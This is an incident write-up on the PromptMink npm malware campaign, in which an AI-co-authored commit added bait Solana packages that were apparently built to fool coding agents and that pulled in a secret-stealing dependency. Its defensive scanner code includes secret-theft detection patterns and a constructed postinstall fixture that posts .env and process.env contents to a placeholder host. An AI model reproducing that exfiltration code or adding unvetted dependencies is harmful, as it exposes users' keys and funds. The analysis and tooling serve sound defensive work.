Claude co-authored a crypto agent commit that pulled in PromptMink malware


ReversingLabs found that an autonomous crypto trading agent ended up with a malicious dependency after a February 2026 commit co-authored by Anthropic's Claude Opus. The package chain looked like routine Solana tooling, but one transitive dependency, @validate-sdk/v2, exfiltrated secrets and could expose crypto wallets and funds. The campaign shows how attackers can build packages that look convincing to AI coding agents, then let the agent do the supply chain install for them.

Incident Details

Severity: Catastrophic
Company: Openpaw Graveyard
Perpetrator: AI Coding Agent
Incident Date:
Blast Radius: Crypto trading agent users risked leaked secrets, wallet access, SSH backdoors, and project source-code exfiltration through a malicious npm dependency chain

Open-source supply-chain attacks used to depend on tricking a human maintainer. PromptMink showed a newer route: make a malicious package look useful to an AI coding agent, then wait for the agent to add it to a real project.

On April 29, 2026, ReversingLabs published research on a malware campaign it named PromptMink. The campaign centered on npm packages that presented themselves as ordinary Web3 developer tooling. One package, @validate-sdk/v2, claimed to provide validation, hashing, encoding, decoding, and random-generation utilities. In reality, ReversingLabs said it stole secrets from the host environment.

The package did not have to persuade every developer directly. It sat behind a more plausible first-layer package, @solana-launchpad/sdk, which looked like a Solana development dependency. That first-layer package was then used by openpaw-graveyard, an npm package for an autonomous crypto trading agent. ReversingLabs traced the dependency addition to a February 28, 2026 source commit that was co-authored by Anthropic's Claude Opus.

That is the failure worth putting in the graveyard. This was not merely a story about malware authors using generative AI to write malware. It was a story about AI-assisted development accepting a package into a crypto agent without catching that the package chain led to an infostealer.

The Package Chain

ReversingLabs described PromptMink as a layered campaign. The first layer consisted of useful-looking crypto packages with names such as @solana-launchpad/sdk, @meme-sdk/trade, and @validate-ethereum-address/core. Those packages could appear relevant to Web3 coding tasks and were padded with familiar dependencies. The second layer contained the payload packages, including @validate-sdk/v2, which performed the malicious work.

That split mattered. If a disposable payload package was detected and removed, the attackers could publish a replacement and point the first-layer package at it, without having to rebuild the bait package's reputation from scratch. It also made the package easier for an automated coding assistant to accept. The AI saw a project that needed Solana or crypto-launchpad functionality. It saw a package whose name and README fit the task. It did not behave like a skeptical software engineer doing dependency review.

According to ReversingLabs, the malicious code scanned environments for secrets, targeted .env and JSON files, exfiltrated sensitive material, and evolved over time. Earlier versions used obfuscated JavaScript. Later versions bundled Node executables and then Rust-compiled Node add-ons. The payload expanded from file theft to SSH persistence and project source-code exfiltration.
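The behaviour ReversingLabs describes (reading .env files and the process environment, sending the contents out, install-time hooks, obfuscated JavaScript, and later native add-ons) is the kind of pattern a triage scan can surface before a freshly installed package is trusted. The following is an added example, not ReversingLabs' tooling and not code from the openpaw-graveyard project. It scans an unpacked package's sources with a small rule set and rates the package "high" only when secret access and an outbound channel both appear, which is the infostealer shape; weaker signals rate "medium". The three package fixtures, their names, and their contents are constructed for the example, and the rule set is a starting point for a human reviewer rather than a verdict.

```javascript
// Added example (not ReversingLabs' tooling and not the project's code):
// heuristic triage scan over an unpacked npm package, run before a new
// dependency is trusted. All packages below are constructed fixtures.

const RULES = {
  // Secret-bearing locations: .env files, the process environment, home/.ssh.
  'secret-access': [
    /process\.env\b/,
    /['"`][^'"`]*\.env(\.\w+)?['"`]/,
    /homedir\s*\(|['"`][^'"`]*\.ssh\b/,
  ],
  // Ways to move data off the host.
  outbound: [
    /\bfetch\s*\(/,
    /\bhttps?\.(request|get)\s*\(/,
    /require\(['"`](net|dgram|tls)['"`]\)/,
    /https?:\/\/[^\s'"`]+/,
  ],
  // Shelling out from package code.
  shell: [/\bchild_process\b|\bexecSync\s*\(|\bspawn(Sync)?\s*\(/],
  // Obfuscation markers: dynamic evaluation and long hex-escaped string blobs.
  obfuscation: [
    /\beval\s*\(|new\s+Function\s*\(/,
    /(\\x[0-9a-f]{2}){8,}/i,
    /String\.fromCharCode\s*\(|\batob\s*\(/,
  ],
};
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// pkg = { name, packageJson: object, files: { relativePath: sourceText } }
function scanPackage(pkg) {
  const findings = [];
  const scripts = (pkg.packageJson && pkg.packageJson.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) findings.push({ kind: 'install-hook', where: 'package.json', match: `${hook}: ${scripts[hook]}` });
  }
  for (const [file, src] of Object.entries(pkg.files)) {
    // Compiled add-ons and gyp build files mean code this scan cannot read.
    if (/\.node$/.test(file) || /(^|\/)binding\.gyp$/.test(file)) {
      findings.push({ kind: 'native-code', where: file, match: file });
    }
    for (const [kind, patterns] of Object.entries(RULES)) {
      for (const re of patterns) {
        const m = src.match(re);
        if (m) findings.push({ kind, where: file, match: m[0].slice(0, 60) });
      }
    }
  }
  const kinds = new Set(findings.map((f) => f.kind));
  let severity = 'low';
  if (kinds.has('secret-access') && (kinds.has('outbound') || kinds.has('shell'))) severity = 'high';
  else if (kinds.size > 0) severity = 'medium';
  return { name: pkg.name, severity, kinds: [...kinds].sort(), findings };
}

// Constructed fixtures; the package names are placeholders, not real packages.
const BENIGN = {
  name: '@example/address-check',
  packageJson: { scripts: { test: 'node test.js' } },
  files: {
    'index.js': [
      "'use strict';",
      'const BASE58 = /^[1-9A-HJ-NP-Za-km-z]{32,44}$/;',
      'function isBase58Address(s) { return typeof s === "string" && BASE58.test(s); }',
      'module.exports = { isBase58Address };',
    ].join('\n'),
  },
};
const STEALER_SHAPED = {
  name: '@example/validate-utils',
  packageJson: { scripts: { postinstall: 'node setup.js' } },
  files: {
    'index.js': 'module.exports = { isHex: (s) => /^[0-9a-f]+$/i.test(s) };',
    'setup.js': [
      "const fs = require('fs');",
      "const env = fs.readFileSync('.env', 'utf8');",
      "fetch('https://collector.example.invalid/', { method: 'POST', body: JSON.stringify({ env, vars: process.env }) });",
    ].join('\n'),
  },
};
const OBFUSCATED = {
  name: '@example/encode-helpers',
  packageJson: {},
  files: { 'index.js': 'const p = "\\x66\\x65\\x74\\x63\\x68\\x28\\x29\\x3b"; eval(p);' },
};

for (const pkg of [BENIGN, STEALER_SHAPED, OBFUSCATED]) {
  const r = scanPackage(pkg);
  console.log(`${r.name}: ${r.severity} (${r.kinds.join(', ') || 'no findings'})`);
}
```

The scoring deliberately separates "reads secrets" from "talks to the network": a package that does either alone is common and merely worth a look, while the combination is the behaviour this campaign relied on. A native-code finding is a prompt to inspect the binary separately, since regexes over source cannot see inside it.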

In a crypto trading agent, that is an especially bad place for the trust failure to land. Environment variables can include wallet keys, API keys, exchange credentials, database credentials, and tokens for services that touch money.

The Agentic Failure

The traditional secure-development answer to dependency risk is boring but effective: inspect new dependencies, check who publishes them, understand their transitive dependencies, run package scanners, and avoid adding new packages when a few lines of local code would do. That discipline gets weaker when the person steering the work is prompting an AI agent rather than reading every diff.
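The review discipline above, understanding what a new dependency pulls in transitively and whether any of it runs code at install time, can be mechanised against the lockfile that a commit changes. The following is an added example, not ReversingLabs' tooling and not code from the openpaw-graveyard project. It diffs two npm lockfiles in the lockfileVersion 3 layout (a "packages" map from install paths such as "node_modules/@scope/name" to metadata) and, for every package that is new or changed, reports the chain of names that pulls it in from the root and whether npm recorded an install script for it. The two lockfiles, the version numbers, the "@example/solana-rpc" placeholder, and the dependency edges are constructed for the example; the package names from the incident are used only as labels in that constructed graph.

```javascript
// Added example (not ReversingLabs' tooling and not the project's code):
// diff two npm lockfiles (lockfileVersion 3) and report new packages with
// the chain that pulls them in. Lockfile contents below are constructed.

// Resolve a dependency name from a parent's install path the way Node does:
// nearest nested node_modules first, then the hoisted top level.
function resolveDep(packages, parentPath, name) {
  let base = parentPath;
  for (;;) {
    const candidate = `${base ? base + '/' : ''}node_modules/${name}`;
    if (packages[candidate]) return candidate;
    if (!base) return null;
    const i = base.lastIndexOf('/node_modules/');
    base = i === -1 ? '' : base.slice(0, i);
  }
}

// Breadth-first walk from the root entry (key ""), recording the shortest
// chain of package names that reaches each installed path.
function dependencyChains(lock) {
  const packages = lock.packages;
  const chains = new Map([['', []]]);
  const queue = [''];
  while (queue.length) {
    const parent = queue.shift();
    const entry = packages[parent];
    const deps = { ...(entry.dependencies || {}), ...(entry.optionalDependencies || {}) };
    for (const name of Object.keys(deps)) {
      const p = resolveDep(packages, parent, name);
      if (p === null || chains.has(p)) continue;
      chains.set(p, [...chains.get(parent), name]);
      queue.push(p);
    }
  }
  return chains;
}

// Every installed path that is absent from, or at a different version than,
// the "before" lockfile, with its chain; direct dependencies first.
function newDependencies(before, after) {
  const chains = dependencyChains(after);
  const report = [];
  for (const [p, meta] of Object.entries(after.packages)) {
    if (p === '') continue;
    const prev = before.packages[p];
    if (prev && prev.version === meta.version) continue;
    const chain = chains.get(p) || [];
    report.push({
      path: p,
      version: meta.version,
      previous: prev ? prev.version : null,
      chain,
      direct: chain.length === 1,
      hasInstallScript: Boolean(meta.hasInstallScript), // npm sets this flag when the package has install scripts
    });
  }
  return report.sort((a, b) => a.chain.length - b.chain.length || a.path.localeCompare(b.path));
}

function formatReport(report) {
  return report.map((r) => {
    const flags = [r.direct ? 'direct' : 'transitive', r.hasInstallScript ? 'INSTALL SCRIPT' : null].filter(Boolean);
    return `${r.chain.join(' > ') || r.path} @ ${r.version} [${flags.join(', ')}]`;
  });
}

// Constructed lockfiles: the state before and after a commit that adds
// @solana-launchpad/sdk to the root project. Versions are placeholders.
const BEFORE = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'openpaw-graveyard', dependencies: { '@example/solana-rpc': '^1.0.0' } },
    'node_modules/@example/solana-rpc': { version: '1.0.0' },
  },
};
const AFTER = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'openpaw-graveyard', dependencies: { '@example/solana-rpc': '^1.0.0', '@solana-launchpad/sdk': '^1.0.0' } },
    'node_modules/@example/solana-rpc': { version: '1.0.0' },
    'node_modules/@solana-launchpad/sdk': {
      version: '1.0.0',
      dependencies: { '@example/solana-rpc': '^2.0.0', '@validate-sdk/v2': '^2.0.0' },
    },
    // Nested copy: the sdk wants a newer major than the root's hoisted one.
    'node_modules/@solana-launchpad/sdk/node_modules/@example/solana-rpc': { version: '2.0.0' },
    'node_modules/@validate-sdk/v2': { version: '2.0.0', hasInstallScript: true },
  },
};

console.log(formatReport(newDependencies(BEFORE, AFTER)).join('\n'));
```

Run against the constructed lockfiles, the report lists one direct addition and two transitive ones, and the second-layer package is the one carrying an install script. That is exactly the line a reviewer should stop on: the agent's diff mentioned one package, but the lockfile change introduced three, and the one that runs code at install time is two hops away from anything the prompt asked for.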

AI coding agents are optimized to make the project compile and satisfy the stated task. A package with the right name, convincing metadata, and exported functions that line up with the prompt can look like a solution. That creates a new supply-chain incentive for attackers: write packages for the agent, not for the human.

ReversingLabs made that point directly. The campaign appeared to use package names, descriptions, and layered dependencies that were effective at deceiving automated coding assistants. The Hacker News, summarizing the research, reported that ReversingLabs linked the campaign to North Korea's Famous Chollima and said the actor was using AI-generated code and layered packaging to deceive coding agents more effectively than human developers.

That is a different shape of dependency attack from classic dependency confusion. The package does not need to beat a careful maintainer. It only needs to beat the coding model's sense of what looks plausible and the rushed approval loop around it.

The Vibe Coding Risk

Vibe coding is often sold as a way to move faster by letting the model handle implementation details. Dependency selection is one of those details. A non-specialist user asks for a feature. The agent decides what library to install. The project starts working. The pull request looks productive. The hidden cost is that the user may not know enough to challenge the dependency choice.

PromptMink is a clean example of why that trust model is brittle. In a hand-built project, a developer adding a crypto dependency might ask why it exists, who maintains it, why it needs a second-layer validation SDK, and what the package runs at install or import time. In an AI-built project, the new dependency can look like implementation noise.

The failure also scales. If one agent learns that a package name is useful for a task, many agents can repeat that choice. If the package metadata is tuned for AI consumption, the recommendation loop becomes part of the attack surface. The malware author no longer has to win search-engine optimization for humans. They can win package-selection optimization for agents.

Why It Belongs Here

The scope line is narrow: this is not a graveyard entry merely because a malicious actor used AI. The entry belongs here because the vulnerable software was an autonomous trading agent whose dependency graph was changed through AI-assisted development, and the harmful result was a malicious package in a real software supply chain.

The human mistake was trusting the agent to pick and add dependencies in a high-risk financial context. The agent mistake was treating a plausible package as a safe package. The attacker advantage was knowing that automated coding systems can be fooled by surface-level relevance.

For developers, the lesson is plain: AI-generated dependency additions need the same review as human-written ones, and probably more. In crypto, infrastructure, healthcare, and any software with secrets in its environment, "the agent added a library" should be treated as a security event until proven otherwise.

PromptMink did not require a novel exploit in the trading agent itself. The exploit was the development workflow. A package looked useful, an agent pulled it in, and the software crossed from fast to compromised.
